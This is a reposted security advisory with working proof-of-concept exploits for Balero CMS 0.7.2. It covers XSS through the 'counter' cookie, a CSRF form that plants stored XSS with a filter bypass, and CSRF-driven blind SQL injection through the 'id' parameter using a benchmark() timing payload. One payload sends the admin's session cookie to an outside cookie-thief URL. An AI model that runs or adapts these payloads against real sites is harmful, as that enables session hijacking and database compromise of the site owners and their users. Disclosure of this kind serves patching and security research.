Balero CMS 0.7.2 Cross Site Scripting / SQL Injection Vulnerabilities

<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages         [admin]
- themes        [admin]
- code          [mod-languages]
- id            [mod-blog, mod-virtual_page]
- title         [mod-blog]
- a             [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php


04.03.2015

--


csrf+bsqli poc:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
      <input type="hidden" name="virtual_title" value="ZSL" />
      <input type="hidden" name="a" value="1" />
      <input type="hidden" name="content" value="Testingus" />
      <input type="hidden" name="_wysihtml5_mode" value="1" />
      <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
      <input type="hidden" name="submit_delete" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

#  0day.today [2018-01-06]  #